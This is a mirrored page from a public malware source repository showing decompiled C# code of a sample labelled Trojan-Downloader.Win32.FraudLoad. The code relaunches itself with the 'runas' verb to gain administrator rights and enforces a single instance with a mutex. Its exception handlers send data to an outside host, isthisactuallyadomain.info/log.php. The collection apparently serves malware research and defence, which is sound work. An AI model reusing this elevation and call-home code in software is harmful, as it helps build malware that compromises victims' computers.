mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
f2ac1ece55
add
117 lines
3.9 KiB
C#
117 lines
3.9 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: mute.Program
|
|
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
|
|
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Net;
|
|
using System.Runtime.InteropServices;
|
|
using System.Security.Principal;
|
|
using System.Threading;
|
|
using System.Web;
|
|
using System.Windows.Forms;
|
|
|
|
namespace mute
|
|
{
|
|
internal static class Program
|
|
{
|
|
[DllImport("kernel32")]
|
|
private static extern int SetUnhandledExceptionFilter(Program.CallBack cb);
|
|
|
|
public static int newexceptionfilter(ref long a) => 1;
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);
|
|
|
|
public static bool IsAdministrator()
|
|
{
|
|
WindowsIdentity current = WindowsIdentity.GetCurrent();
|
|
return null != current && new WindowsPrincipal(current).IsInRole(WindowsBuiltInRole.Administrator);
|
|
}
|
|
|
|
[STAThread]
|
|
private static void Main()
|
|
{
|
|
if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath && !Program.IsAdministrator())
|
|
{
|
|
Process.Start(new ProcessStartInfo()
|
|
{
|
|
FileName = Application.ExecutablePath,
|
|
Verb = "runas"
|
|
});
|
|
}
|
|
else
|
|
{
|
|
Thread.Sleep(5000);
|
|
bool createdNew;
|
|
Mutex mutex = new Mutex(true, Application.ProductName, out createdNew);
|
|
if (!createdNew)
|
|
return;
|
|
System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty");
|
|
Application.EnableVisualStyles();
|
|
Application.SetCompatibleTextRenderingDefault(false);
|
|
try
|
|
{
|
|
Application.Run((Form) new Form1());
|
|
}
|
|
catch (Exception ex1)
|
|
{
|
|
string str = string.Format("Unhandled Exception Raised:{0}", (object) ex1.Message);
|
|
WebClient webClient = new WebClient();
|
|
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
|
|
try
|
|
{
|
|
webClient.DownloadString(address);
|
|
}
|
|
catch (Exception ex2)
|
|
{
|
|
int num = (int) MessageBox.Show(str);
|
|
}
|
|
}
|
|
finally
|
|
{
|
|
mutex.ReleaseMutex();
|
|
}
|
|
}
|
|
}
|
|
|
|
private static void ThreadHandler(object sender, ThreadExceptionEventArgs args)
|
|
{
|
|
string str = string.Format("Unhandled Exception Raised:{0}", (object) args.Exception.Message);
|
|
WebClient webClient = new WebClient();
|
|
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
|
|
try
|
|
{
|
|
webClient.DownloadString(address);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
int num = (int) MessageBox.Show(str);
|
|
}
|
|
Application.Exit();
|
|
}
|
|
|
|
private static void MyHandler(object sender, UnhandledExceptionEventArgs args)
|
|
{
|
|
string str = string.Format("Unhandled Exception Raised:{0}", (object) ((Exception) args.ExceptionObject).Message);
|
|
WebClient webClient = new WebClient();
|
|
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
|
|
try
|
|
{
|
|
webClient.DownloadString(address);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
int num = (int) MessageBox.Show(str);
|
|
}
|
|
Application.Exit();
|
|
}
|
|
|
|
public delegate int CallBack(ref long a);
|
|
}
|
|
}
|